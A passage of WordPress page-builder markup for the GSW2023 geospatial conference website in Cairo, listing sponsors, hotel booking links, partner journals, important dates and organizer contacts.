css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> 